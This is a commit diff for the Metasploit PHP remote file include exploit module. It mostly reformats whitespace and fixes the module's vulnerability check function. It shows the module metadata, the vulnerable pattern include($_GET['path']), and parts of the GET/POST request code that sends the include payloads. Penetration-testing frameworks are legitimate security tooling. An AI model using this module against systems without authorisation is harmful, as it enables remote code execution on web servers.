Land #2237 - Fix check function

modules/exploits/unix/webapp/php_include.rb

@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+#	 http://metasploit.com/
 ##
 
 require 'msf/core'
@@ -16,36 +16,36 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'PHP Remote File Include Generic Code Execution',
+			'Name'		 => 'PHP Remote File Include Generic Code Execution',
-			'Description'    => %q{
+			'Description'	 => %q{
 					This module can be used to exploit any generic PHP file include vulnerability,
 				where the application includes code like the following:
 
 				<?php include($_GET['path']); ?>
 			},
-			'Author'         => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
+			'Author'		 => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
-			'License'        => MSF_LICENSE,
+			'License'		 => MSF_LICENSE,
-			#'References'     => [ ],
+			#'References'	=> [ ],
-			'Privileged'     => false,
+			'Privileged'	 => false,
-			'Payload'        =>
+			'Payload'		 =>
 				{
 					'DisableNops' => true,
-					'Compat'      =>
+					'Compat'		=>
 						{
 							'ConnectionType' => 'find',
 						},
 					# Arbitrary big number. The payload gets sent as an HTTP
 					# response body, so really it's unlimited
-					'Space'       => 262144, # 256k
+					'Space'	=> 262144, # 256k
 				},
 			'DefaultOptions' =>
 				{
 					'WfsDelay' => 30
 				},
 			'DisclosureDate' => 'Dec 17 2006',
-			'Platform'       => 'php',
+			'Platform'	 => 'php',
-			'Arch'           => ARCH_PHP,
+			'Arch'		 => ARCH_PHP,
-			'Targets'        => [[ 'Automatic', { }]],
+			'Targets'		 => [[ 'Automatic', { }]],
 			'DefaultTarget' => 0))
 
 		register_options([
@@ -59,19 +59,25 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class)
 	end
 
-	def check
+		def check
-		uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
+				uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
-		if(uri and ! uri.empty?)
+
-			uri.gsub!(/\?.*/, "")
+				tpath = normalize_uri(datastore['PATH'])
-			print_status("Checking uri #{uri}")
+				if tpath[-1,1] == '/'
-			response = send_request_raw({ 'uri' => uri})
+						tpath = tpath.chop
-			return Exploit::CheckCode::Detected if response.code == 200
+				end
-			print_error("Server responded with #{response.code}")
+
-			return Exploit::CheckCode::Safe
+				if(uri and ! uri.empty?)
-		else
+						uri.gsub!(/\?.*/, "")
-			return Exploit::CheckCode::Unknown
+						print_status("Checking uri #{rhost+tpath+uri}")
+						response = send_request_raw({ 'uri' => tpath+uri})
+						return Exploit::CheckCode::Detected if response.code == 200
+						print_error("Server responded with #{response.code}")
+						return Exploit::CheckCode::Safe
+				else
+						return Exploit::CheckCode::Unknown
+				end
 		end
-	end
 
 	def datastore_headers
 		headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
@@ -128,23 +134,23 @@ class Metasploit3 < Msf::Exploit::Remote
 		uris.each do |uri|
 			break if session_created?
 
-			# print_status("Sending #{tpath+uri}")
+			vprint_status("Sending: #{rhost+tpath+uri}")
 			begin
 				if http_method == "GET"
 					response = send_request_raw( {
 						'global' => true,
-						'uri'    => tpath+uri,
+						'uri'	 => tpath+uri,
 						'headers' => datastore_headers,
 					}, timeout)
 				elsif http_method == "POST"
 					response = send_request_raw(
 						{
-							'global'  => true,
+							'global'	=> true,
-							'uri'     => tpath+uri,
+							'uri'	=> tpath+uri,
-							'method'  => http_method,
+							'method'	=> http_method,
-							'data'    => postdata,
+							'data'	=> postdata,
 							'headers' => datastore_headers.merge({
-								'Content-Type'   => 'application/x-www-form-urlencoded',
+								'Content-Type'	 => 'application/x-www-form-urlencoded',
 								'Content-Length' => postdata.length
 							})
 						}, timeout)